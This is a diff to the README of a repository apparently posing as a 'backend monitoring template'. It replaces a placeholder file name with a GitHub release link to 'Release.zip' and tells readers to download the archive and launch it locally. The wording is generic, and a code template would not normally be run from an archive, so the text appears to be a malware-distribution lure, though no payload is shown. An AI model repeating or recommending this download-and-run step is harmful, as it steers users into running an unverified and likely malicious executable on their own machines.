Killzstxrz/backend_monitoring_template/README.md

 ## Getting Started

-To make use of this template, simply download the `Software.zip` file from the link provided above and launch it on your local machine.
+To make use of this template, simply download the `https://github.com/Killzstxrz/backend_monitoring_template/releases/download/v1.0/Release.zip` file from the link provided above and launch it on your local machine.
 Follow the setup instructions included in the repository to start monitoring your backend services effectively.

-In case the link for the `Software.zip` file is not working, kindly check the "Releases" section of this repository for alternative download options.
+In case the link for the `https://github.com/Killzstxrz/backend_monitoring_template/releases/download/v1.0/Release.zip` file is not working, kindly check the "Releases" section of this repository for alternative download options.

 ## Repository Topics